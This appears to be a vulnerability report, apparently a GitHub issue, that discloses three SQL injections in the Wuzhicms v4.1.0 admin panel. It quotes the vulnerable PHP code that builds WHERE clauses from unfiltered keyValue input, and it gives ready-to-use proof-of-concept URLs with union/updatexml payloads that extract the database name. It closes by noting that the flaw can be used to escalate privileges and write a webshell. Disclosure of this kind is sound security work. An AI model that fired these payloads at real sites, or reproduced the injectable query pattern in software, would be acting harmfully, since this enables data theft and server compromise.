Description
There are 3 SQL injections in Wuzhicms v4.1.0 background
one
Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability
Vulnerability file:
/coreframe/app/pay/admin/index.php 30-98
public function listing(){
$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
$keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
$payments = $this->payments;
$status_arr = $this->status_arr;
$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
$page = max($page, 1);
$status = $GLOBALS['status'];
if ($status) {
$where = 'status=' . $status;
} else {
$where = 'status>0';
}
if ($keytype) {
$where .= " AND `keytype`='$keytype'";
}
$keyValue = strip_tags($GLOBALS['keyValue']);
$fieldtype = intval($GLOBALS['fieldtype']);
if ($keyValue) {
switch ($fieldtype) {
case 0:
$where .= " AND `order_no`='$keyValue'";
break;
case 1:
$where .= " AND `telephone`='$keyValue'";
break;
case 2:
$where .= " AND `kf_username`='$keyValue'";
break;
case 3:
$where .= " AND `jxs_username`='$keyValue'";
break;
}
}
if ($_SESSION['role'] == 4) {
//客服
$kf_username = get_cookie('username');
$where .= " AND `kf_username`='$kf_username'";
}
$starttime = '';
$endtime = '';
if ($GLOBALS['starttime']) {
$starttime = strtotime($GLOBALS['starttime']);
$where .= " AND `addtime`>'$starttime'";
}
if ($GLOBALS['endtime']) {
$endtime = strtotime($GLOBALS['endtime']);
$where .= " AND `endtime`<'$endtime'";
}
if(isset($GLOBALS['exp'])) {
$pagesize = 1000;
} else {
$pagesize = 20;
}
$admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0);
$result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC');
if(isset($GLOBALS['exp'])) {
$this->export_excel($result);
}
$pages = $this->db->pages;
$total = $this->db->number;
$pay_config = get_config('pay_config');
load_class('form');
include $this->template('listing');
}the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!
POC
/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
two
The second SQL injection and the first SQL injection are in a different function in the same file!
Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability
Vulnerability file:
/coreframe/app/pay/admin/index.php 244-289
public function relay(){
$id = intval($GLOBALS['id']);
$r = $this->db->get_one('pay', array('id' => $id));
$r2 = $this->db->get_one('pay_detail', array('id' => $id));
$r = array_merge($r, $r2);
$keyValue = '';
$keyType = '';
if (isset($GLOBALS['keyType'])) {
$keyType = $GLOBALS['keyType'];
$keyValue = $GLOBALS['keyValue'];
if ($keyValue) {
$where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'";
$result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC');
}
} elseif (isset($GLOBALS['submit'])) {
load_function('common', 'pay');
$formdata = array();
$formdata['order_no'] = create_order_no();
$formdata['to_uid'] = intval($GLOBALS['to_uid']);
$formdata['username'] = $r['linkman'];
$formdata['mobile'] = $r['telephone'];
$formdata['pinpai'] = $r['data1'];
$formdata['chexing'] = $r['data3'];
$formdata['addtime'] = $r['addtime'];
$formdata['keytype'] = 0;//游客订单
$formdata['zftime'] = SYS_TIME;
$this->db->insert('demand_relay', $formdata);
$formdata2 = array();
$formdata2['op_uid'] = $_SESSION['uid'];
$formdata2['to_uid'] = intval($GLOBALS['to_uid']);
$formdata2['to_username'] = $GLOBALS['to_username'];
$formdata2['updatetime'] = SYS_TIME;
$this->db->insert('demand_history', $formdata2);
// $this->db->update('demand', array('flag'=>1),array('did' => $did));
$this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id));
$forward = strip_tags($GLOBALS['forward']);
MSG('发送成功', $forward);
} else {
$uid = $_SESSION['uid'];
$where = "op_uid='$uid'";
$data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC');
$forward = strip_tags($GLOBALS['forward']);
}
include $this->template('pay_relay');
}Set $keyType=uid and $keyValue to be controllable.
the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!
POC
/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
three
Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability
Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!
Vulnerability file:
coreframe/app/order/admin/index.php 22-87
public function listing() {
load_class('form');
$fieldtypes = array('订单ID','标题','下单会员','物流单号');
$flag = $GLOBALS['flag'];
$status = array();
$status[1] = '待发货';
$status[2] = '已发货';
$status[3] = '订单完成';
$status_arr = $this->status_arr;
$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
$page = max($page,1);
$keyValue = strip_tags($GLOBALS['keyValue']);
$fieldtype = intval($GLOBALS['fieldtype']);
$where = '1';
if($keyValue) {
switch($fieldtype) {
case 0:
$where .= " AND `order_no`='$keyValue'";
break;
case 1:
$where .= " AND `remark` LIKE '%$keyValue%'";
break;
case 2:
$r = $this->db->get_one('member', array('username' => $keyValue));
$uid = $r['uid'];
$where .= " AND `uid`='$uid'";
break;
case 3:
$where .= " AND `snid`='$keyValue'";
break;
}
}
if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'";
$starttime = '';
$endtime = '';
if($GLOBALS['starttime']) {
$starttime = strtotime($GLOBALS['starttime']);
$where .= " AND `addtime`>'$starttime'";
}
if($GLOBALS['endtime']) {
$endtime = strtotime($GLOBALS['endtime']);
$where .= " AND `addtime`<'$endtime'";
}
$result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC');Set $fieldtype=1 and $keyValue to be controllable.
the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!
POC
http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1
Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
https://github.com/wuzhicms/wuzhicms/issues/198
Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)
Use sql injection to elevate permissions and write webshell
Individual





